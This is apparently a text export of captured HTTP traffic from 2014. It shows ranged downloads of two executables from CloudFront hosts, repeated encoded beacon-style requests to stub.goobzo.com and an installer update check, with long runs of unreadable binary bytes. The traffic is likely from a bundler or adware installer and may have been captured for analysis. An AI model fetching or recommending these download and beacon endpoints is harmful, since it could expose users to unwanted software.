    IqP.....S..z.GFr@[email protected]!(@m4T.....Qgz..=;C.^....t$hiAAQ
    [email protected].?sE.J...y.ov.&
    .T....ap......sY.^*-mi.4....N...w[l....6..:E...'..*...p0|...u$....px..
    `.>......p.TA..L....3`eD.`.C.E.....K......_3.qS..D..._.......?L ...
    W.e/....AD....K.xHP...W8..0.Cx..s....>.H...."....1(.B...@..(.AX.v4.
    ....ZPkQ.E....v..l.l...Nr..j.....T....N..F...}....S.R.MI..../.iK.V...;
    .<f.....8.`/..7..o...y...N.Dm..... ..^.U`..5...~.x...C..)T....F.. .
    ..-...P..;U;.:..$..H........LH.>.........#...;....#.......x..Cs..z.
    ...G..8....*....|/.].`j...c..4'%....m...H..!."S}*.:=.=.8.c%...OO..8.)E
    .......V.,........u....I...#[email protected].>.. H..P...
    .].w{."....t..ZEj..^\..=.....@whu..!.c.'..H...Vvl.....>.w[.....9...
    I#Z......63q%@..S.QI. %V.lt..$...%...v..L.Icl.J..!5).$...$.=.o>B...
    2}[email protected]?.~...iV1.-....%.VX...B^.\..J.....:..j.Akd-.Z.k%....S......O .
    ...<...nH....X..d.....^.z._:=v..,.a..y.y.zGn..N.4X....<.....

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=4500000-4749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4500000-4749999/5377936
    Age: 76505
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: DOb0LWxNPrXNhHP-mjJK7w5VWjhqGyGNwQFdFAuO8alfYkFKCGIdMg==
    .Q...........y..\......#....s..J.O.V.......<...........R{......8/.L
    7.J...e..^.*.....n.....m.v..Mr.....=......KRu>......c....<|oWo..
    .......j...N..Ih.?.R.....W.[.7....g.../..sv]..C........d=..{8..F3CE.t.
    ..c.....W#/.t .E....8.o........SnG..W.......i.h.J.....z.....<..pu..
    .Z.=.5|....K..mU...-......Z.k.......>p..J3C?.1Bs../..O........E..SM
    ..;.......!IN....... .O...).T.....w@...)L..6._...J..G.......&1.}.=....
    -...-...8"#....w#..a.......M.f..?Q.=..@)...%.w&xy..E..pN......Y(B..Q'l
    .6.Fk........yN...oQ~8.(..l._..lm&....=..f.......J....C*......j.\H.Sv.
    z@/&"..YC.9V3....Ip::].kz;.N.g....g.3...Lv....8..D.?.o.7..?......z.<
    ;.E19...........pe..M.!......J.........*.Q.D%O..6..S.m...f.y.<j.4..
    ..E.....y..g6.. ..e.Zy..............s..&...../.L....v..O......)hT5....
    ..R..).....Y..'...".).Tv.;.x..][email protected].[eah.V.6....9v.....F...T.nOV.7
    ......p....z.]Tt...y.9...3]...v3#V.....S..>...0.....4..~F....g...l)
    ...O.o....zJ.......h...S|.....:.#...........er.|....gA.L...'..Zt.!_...
    .~$-....q?._{.....,,...mV.#7...P...<S....c..V.....)....r..UwZ...6..
    .7..TG.z.../r.......g..!'r.....#..y...t.2xAWZ....;R.....sx#|.~..k. BE.
    '...r..."..x..<C.$V3....g.5.....)<.U.....T...1E.....?..G...z..n6
    ....W^.I.....p........X.).NW..3.T..3. pq;..k....:......SA.u...-...;o..
    .q..e..;.........>..._n...*n..WU.R'.o......v...."......;...:..3.a_^
    =.\*EP.k.......n...\.....Ia.........3.........W.8~s..X.U=..r.^......^i
    &K4..Vz.r....{....../.T.".3.3........;........Hb.......<......*..f.
    p.?.op.<..vh.s...*....&.........t`...O..94...m.^..`._.w.m".[.=.

    <<< skipped >>>

    GET /yta33_full.exe HTTP/1.1

    Range: bytes=5000000-5249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d3bg798gjlk71j.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Thu, 22 May 2014 21:14:30 GMT
    Last-Modified: Thu, 22 May 2014 10:48:21 GMT
    ETag: "1b2fb86798d5290ccbbc1053a2ce3421"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5000000-5249999/5377936
    Age: 76508
    X-Cache: Hit from cloudfront
    Via: 1.1 e7da403522e538b0ffd1683e0ff0937f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: dDTjVCEpChhu_KT9CrZqZDzSRviDd6hKugtnKK5dO9Hz4bKU6VFxSQ==
    .JU.K.gy....(....T...(..].\................[Q....1pN.~.(.Q.j....8.6K.Q
    Y.&F.i..CH....-pc..ps<.8Y..9C...3.'[email protected]_.T.&
    gt;m...%.8Q....Tn"NDo6.'.0.q.......F.D.5.'......Gq...1Z..........t./..
    ......E././.....-../zu...L......{Bf.......6.p...@9^..8....}..`}..Au..A
    [email protected]"'h..i...O...M.?,.o.....\.a..............H...O.73~T.....r..
    ..3.Y..Av..C..>...?.......;4@].c8b.q.a.>t.9..X..H.a.b.F.........
    .....Z8.9.!.%.. _............&=.t>m6p..f.....S.B.R..C...PP..1\...$.
    ....d...OE...yO....8.*Lv2...7.r...7.r..43I......0......3......07T..O..
    .0....;.....'`..<.... v.:.:~..??...A...JM.C..M...[7%......hK.~=z...
    ......8.tH.KNuY.."5..MX....40h2..w.?....)..)1o..C....1..e....;n .V....
    0...X.x#[email protected]._..I...-....7..a......%......T.8B.W...
    .........3...)........E...l...L>.E.._.C.*Y<\._.B.;=...p.. ....zt
    X.......x%.{#......adK..yLo.............`v.......2W..r...Y..H....p/Q.&
    gt;5..........n]...\........2....q4p.8..A@>..P.B\}...&......`.v....
    K$5L....\]\F.......v..u.]'pm...(eN.IV.......H.d.U...*.].O.O.......e=Z.
    M%~B..|=u....=.,.j|.......h.F3..vT...:g.P.@t.{...}....-.v......].&1. .
    ...W`?S.."@.....t{....d_...;@........z..E..2.mv.u.... ..'tM{...@zg6bQ.
    ..h..&......e.0.....Q...m...........'y".z%./......#6...;./...j<J..V
    ..(.....a.....-...j. dq.Q....9.2..._P!..Q..L;.....u.r*......Z...)dx.44
    d..6...".e,r..f|........9..r..]..7hg....).E...&........D.d...i...k....
    V...n.......N.C....._.MfW.....%..L.:...[...........u..........i...{$;R
    J..:I....t.4.......62G.tA|..`.0...|^...{....|......C.......u/..P.y

    <<< skipped >>>

    GET /p.ashx?e=blUJ6JGwk9JN39k7Xfv8ZV9Aufo681yTjA5kVqVgWdAgLxC0aXqYrfeVKhATcvrDNnjgeuHGNQp4nJxtavSnm1i2s6XsF8NY0jd2Ua9SYWgE8SFHLIEPsD LD4ni i1YEiOd5JlEvhcmtYgda2X5ilO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESzprDiolRFccz/yeZN BbCCmF904v4t2DsX3/aWOzPqONmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciwyyzTF2Y0WVu HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESzzzSAUigcDOBH7l0Cnb62dCUHeR8YCF3HUDXrv0Zk8ASGzXJG4Eokf4VYfpEwhPiF9IEmN/K55dAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESrStpyyCRN5x7ym41MswgnBQC drCF7eFiSXUoJ39wxGjbYuukLQCoXwPQ5gP4GDmLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:25 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jaShngkjl6Wn7OXLse4BafSePFQUn2Ibrb6Gb8KFABTw0I GKFrrI062Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSbLRD/MFmTIYRWGjyvG Kbs0adlvQBqn5d37ZJy NkuaYCpHZc9ZUaFXs9sbgOmK8XSpt9GSHWXQpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0Zhyze53cwABqbvzvuecEvvoV 3l7LlOf9f0898E/SBG0B991fXLZafzwI HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e=k64GogClQtU 8U9Mk34kw/yNKERWcmikQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprJ7TtIX8b4qVV9lf0hTetO1oT5C62qh05tCUHeR8YCF3egGeWRl96bH2oAxl1mhtveUQN84Hz3rwniLkiNQiEIG07vMSOQOxGVl64 mVHwG YSrViaugUztufIAI6WL2lImkToQE5nQmvfvOiTlw65KWRoYetJhI8EvYQcB047WXU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2r56EmzsP6UAbrZvJ7les BWCHtMDhAbGax DpF9NlexmV95JLFrqAJKwJoUkgeXWg== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:54:26 GMT..Content-Length: 0..
    .
    ...



    GET /p.ashx?e=eISsn0A7mAaebxLgvS5H7tZgHY49gcCUCIsqLvtsfMf8ln8Iap23/86yhOERrUppUA7dl9owwhK3G2s59l7sl5cZvAfHQnSa7kaOF pd5SUvlUNMetnoY0zIpvq0RRcJlQw8J vYOFWqQjerOGqsHsvrf4q/fSIg54ebh5tiGXex2KlVs8m8LqSlVGmgAnwD/CamQonQoAdJZRjG3TGo2o2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLN7ndzAAGpu/O 55wS hX7eXsuU5/1/Tz3wT9IEbQH33V9ctlp/PAg= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfS6veuaYiF5bUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FK6VCsNuKBiir8uE40O0xGz4zJfSwDmmmLcb2RMdMffP3LkO87mF5Z0g== HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:26 GMT
    Content-Length: 0
    ....



    GET /p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfSCFk3XNAVUc7IYlr SWvBW7PiCC4paVhdbnp1XaZJ5KlgwvRa16pLqmxyOCGsbcxpeUIGadR1XBkklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEukCI5CZ2WmqAll3fTsajgGYMVIw7RC6ErYt1 5zlXVo5WT24lsyMUdcjVmlmgA9lM= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:27 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:54:27 GMT..Content-Length: 0..


    GET /installer_updates/000803/update.json HTTP/1.1
    User-Agent: NSIS_Inetc (Mozilla)
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:09 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1393779143"
    Last-Modified: Sun, 02 Mar 2014 16:52:23 GMT
    Cache-Control: max-age=12435
    Content-Length: 39
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1401908109.dop011.am4.t,1401908109.cds041.am4.c
    {"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Wed, 04 
    Jun 2014 18:55:09 GMT..Keep-Alive: timeout=10, max=100..Connection: Ke
    ep-Alive..Accept-Ranges: bytes..ETag: "1393779143"..Last-Modified: Sun
    , 02 Mar 2014 16:52:23 GMT..Cache-Control: max-age=12435..Content-Leng
    th: 39..Content-Type: text/plain; charset=UTF-8..X-HW: 1401908109.dop0
    11.am4.t,1401908109.cds041.am4.c..{"update_from_version":"NA","url":"N
    A"}..


    GET /object-browser10.exe HTTP/1.1
    Range: bytes=250000-499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 250000-499999/5945624
    Age: 22286
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: LLNDo7K4kVnTDx1_eYWvxPr72CIuOHABQIj37XVV1XHHQ7puxbWFXA==
    ....;..._... B".....y.J*Dg.7.=..~.....G_...... ....s..l..a....8...(.v.
    .....YM.i..z.dv.Ha.....8$#. 7.A.d.....i.*'..v.........$,w.R.V .l....$.
    ....c...[.............,.).!.3v.<C<P.N..9...R....<.y.[XH^..tm.
    ..Q..V( ..M1x......e...=..<.....xp]h`[email protected].[.....l.@`....8M..~..
    ...H.EG~.....o.9M.d.....n.*/.=g}.........?.Pn.Qj.t.'..,:.1..]mn.Y8.!(.
    ....88.......E..."..j....Q.....,..."&...T...._k....qn2..^....1;GwQ..4.
    .6..c.R..z.2......%..dP|.E'.`..;...=>S.z..dM//CL...FQ .x.~....n...u
    n._}...*B)(....WiJ.....%.e...v_.e@L .h.yf/..m75..a.>)..2...o.s2B...
    #v.AY\u.....R.g.g.#!X....7...tG..EfF...z....-].A..H...x@.$..}_z.8.o6..
    .l*..)..cN..*._..f6.../4......z..\...&..ad..M...e".....c6..f..$h.<}
    ....\.v2.N.k..i.F.NT..<.b......z=.....&.d0KKS..?...<.}Lgu.4.6...
    ..S....?..2.....e.(.Y...Ur..o..P.......Q.%...@%.....R..5..F..U...#....
    3.e..'..m.qU.]A.sn.;R....{.l.j..u.a.{..s...j<.5.Zdy.`a.F.V.W..;]W..
    a..d........S)[email protected]...\.o....m.W..1.8.?;=....6 ..0..a...q.geb=.{..&
    lt;.OIk..:|z....D.*..u;.c.....j...t[UP..3...M.^#...sh......ck...?.##..
    ..i3s...qL 2|i.c.f.....Y...b....D.m..M.ka.N. .n...p.`/..h..Z..%....."}
    .0.Z..Mk4:.n.uc........e...7........=.........1Lc.=2.....X.r.A.ES_J>
    ;G-..=..Ce.......E.A........ [m....a.....>w.Y....(............P.d%p
    J..>......x{.T...G..[..1...*j.T...R.dBjN...&.[_.1Q.qy....B.[..._...
    .~..........Cg..g.t...?......s .....| ....t'L......@...}.....u.l.O=S0.
    .....P...b....~...0M.(....4...y.. .7..r.........O[?.......S......w.~..
    q!X..8.....R.....w.sCQF..m.d..;^.z3.#..~.U........X...|....gC.6@..

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=750000-999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 750000-999999/5945624
    Age: 22289
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: S9KopkQgHQLdSPW6FE_54Qr3QTYXeEfJGZ7fkIdcEp-elqcH85aIQg==
    ..>...A)G.."q...9..4?.=.O.......uk9.5...t.......?`W.L.z/GU..Z. Uz..
    .,z.EL.T.s...(u.{.......{h9. &HZ.5WLA3`...........S&w....Y.5WG#...;^..
    ....8(f.>..zP...)O.8XsTb-zH...............g=.I.g....CZ.I..e..Q..b..
    .......M-...?.C.....e....h.;..P=.$gm..........o..#T....K.}..> ...:.
    ..g.c*.....V...)M../....8.....g..[...uh.. ..o...6.....v.|.....&.....P~
    Z.H...<.7.......:W.....nzq.#kR....V...%L..2p.P.i...{...9...~W.#. pX
    .th.-.M^......?3.9;.paEZ.&_..&..S^S#......n..E7m.~.....L.q/Y<....".
    s.)).....D(.....E.[>..G..d.=.?.v..U2......._4.WUq....%.......I....y
    x.....|.E.."F.......T.q.v..F..P ."...gFcx..&<......j..?8...(..zl...
    U.0Qm......h...~.......S.X?.L..r.RE...f...M$.Bz...t...............Jy/.
    ..W.......I)<..w.-.s..[......5kX J....8.0.....Pg....}...'^MI.b%.H.Q
    1....P....O8...L.....U)....X'.J.y....G....IS.lP].Ob.E.T#............-s
    l.P.'....d.;KD.;N..i.r....D...w....C#.OT..Z. .b{.5.1.kC!)%.....A7....*
    WJ..<...V....[.\.L.hP.s.-...m.E..`.L .7B.D..$r9..%...7.k..fj.*2...A
    .{.........V.u.v/.\..m.....bF...B...Q x...K.o..u.v|.#.e....>.v...g.
    .imI...>...&...&....p..q..V........9i..j[.3....4%u.....\.P[..5...2%
    [email protected],......U.....i.&.v%$u.......(/. [email protected].'..Z..?S.Q.,
    ..F.FE..[]Wl>....Q...9...c.QS....2&5 ....h.Ff..:"...UW....|1...xe.0
    [email protected].}..&\....a.g.......#ytYm.!..g.Q%J.B.u.......
    ...:F.<CD.M%....w..v4....#q8|.r.*."...dT.).z.1....F.....G..*S5...R.
    .$....;..A...P....A-#..#....!.!.q..*}S\..._.?. =.m9.......,..gHOA.b.";
    .e2.C.....B.7.......; T./......dz.3cK.{Pu.Z:....*.rg`...:..z...(..

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=1000000-1249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1000000-1249999/5945624
    Age: 22291
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 6ovSqRoLgSg2A6MFgBxgDjgWtXqRxhLlQ_Aqw3A-Xkk1DVBheBOVEQ==
    -.._..........-T.-.-.x..v........Q.... ...k......6.vO.A.g.H_o.J."U$.H@
    ....&e.i...Y...}.'.O..k.e.bXa.G.>0.......tmv..@"-...%-......-...e.F
    ..PJ<.4..\..y.,..|.`q6......R....&lS2.z..V....P....D."]....0.2[....
    qrx.k..;</k....\....=bX.,...&..}].B..s?F^..`b...^...7..........?.D.
    q.J.$.....L....`#Ui[...I..S....... ..k.p...o.{...7%.H...Q"ssq.fV...Hs.
    ..A.n....a........:...._...0..f.O\'$...'.....m..n.'.L..1.h.].......}.V
    ..0`....}1...E .3...w...".aN. ...../..p9j/}2..x......W.;.;....G....k.o
    .G.M......p..r......{.....Z.O:;.iC......:.. k..dC.2.j2...g.1f..*..Z...
    k...d9...&|...a:.K0..^...;l....1I..M...{C...T..".E......8V.5....../...
    :...........'..h0p1...jx.>..-..r..}B.8h0.L...j...c...9.D.B.v(...v.g
    =.........W........e.m....0.gN....K...*nC.O..i2RF|.k..[.B..)..4.].....
    ]`[=.Z.$.I.... . .QaJ&....sm.-zjz>.%.'... .....N...i..0Ja....#.L=S.
    .CE]..b.qt..q.....&b..{.c....-..._.$q.Oj.......<O[.p.b..a.M.9.l. ..
    .......?.".:..H.R....I......J.../..X5W.=...E."A=..Pvc...5.u.......<
    I5..,.......vhK...W>.....H\...P..?.8.....A..<.....y.E.d.....;..{
    .k.1.......V.!.......(D...Z.".m.....^....L..K...(.Z.Xd[d_C.fu.........
    p}_....g............aa"i4"p.......\.....p.]'.......5...q.....q*Kr.6...
    ..p]...j.. ..l|>.R.../J-..Ni.....:.......`...!.....6.I2#.;k...?..1.
    ..U..)S?.|..,..k...>....".%a.)$t......].2.....`..B[.@I#.y...O&..&b.
    ...hH.......,[email protected]]u.]..F.L..*...$..pq..(x...V....b.8....WSo._O.o
    .Y.....\...ie4J.{O...e.0J.Sytb.R`.S.h..k.v*...%>F.......$.W..e.*!.1
    ;....)..k....-wb. M.l..\w...r..k..:..j.9...x....;..u.]..0.p....0..

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=1500000-1749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1500000-1749999/5945624
    Age: 22294
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: u28auzOX5g6Wxh116ZfcyDJB8emOaDWFS8NKvb1N4Cb_3uz6rbuztg==
    J.`:.{/....a..]_N..:..!...k......h.L...s~ z.....Hmg\GjE!$".z.0=f..[.s.
    8.K.?T..zx.\..SE.:S..^^.J.x.>..EM(F...eH1.S..zAl.[....up....H..a.C.
    ..n3H.M`..q....R...E.Q.UrA*....}>.j.x.8... aa.=..&`$.............lE
    4'..%.m.Z!...v.[".x'..@/a..p...U..<u:.......5x6....?...X....L.Xzu.$
    .B_v.m#|6..P...E.>...S.......#..c..2..iF..7a!%.S%...s..Woj...J._..?
    ..R..@.....=..W..@."I..w......'..........E.D`{........E.K..zK.6.~.....
    ..5O...w.:KM.V..."{QQFt6...z........v......u..I.W.3^u....)...5..B.....
    .....K...^....K$.k..15(.SL3.....}v...FS..S..Hn..[....(..D...\T.<...
    Ri...g`P...?..7'H.t........D.w..;.R"..p.I...qb"]..r>..4.E.......g..
    ..LX..'.6M...i..|..6O.;]...<....r.w.L...H..p....._8..z..........&).
    j./..6...]..n...........AO..l....-[W...?..... .*..a.z'2o@UEw.#n.....W
    (.1...?|...k...H..)"....D..x.&mf.......w....:..|.G.......A.q..9(Q.1..N
    ...H....n..<.Os.V..0l.e..-..Y./X.~..X.u.D...m}..T.^6......%...,.;d.
    .\.S.^.X...~.!g.E....$..l..f&...f.ZaL.......4]....q.......:8........f.
    ..eC..b....Xe.A..0..&.....?.I.......'......m-.....k......[. .G(......G
    ...i.. /ru.<.,K4...1#..3..P}..w.;.hd..yZ..R..]b...o._........dCcS.~
    t..:..<.I..H.'<.pM.5...|..*.Q..~.]......D...t...}.2sq:a.Y.0De3.:
    .g.).u..f.G.@;D.....7..A....o=..........B...oV....N2.l....t.......o.h.
    q.2.$.e.......'.....J20O.'......T...........{)[email protected] Y.........b....
    &Z1.7"Z[2.d.._........B..=?..r.;.....x...P.fXW.d.Y..8 .=\..z.4.Y.H....
    ......C}...M6AD............3..%....2..g......7......y.,Qz.....'..I..v.
    ...}.lj.A.6...#m.H..R....`..{%0.Kp...Os....Cl..../Q...o......m. .E

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=2000000-2249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2000000-2249999/5945624
    Age: 22298
    X-Cache: Hit from cloudfront
    Via: 1.1 a662e3af6999e7a8504a8b518b9be9ab.cloudfront.net (CloudFront)
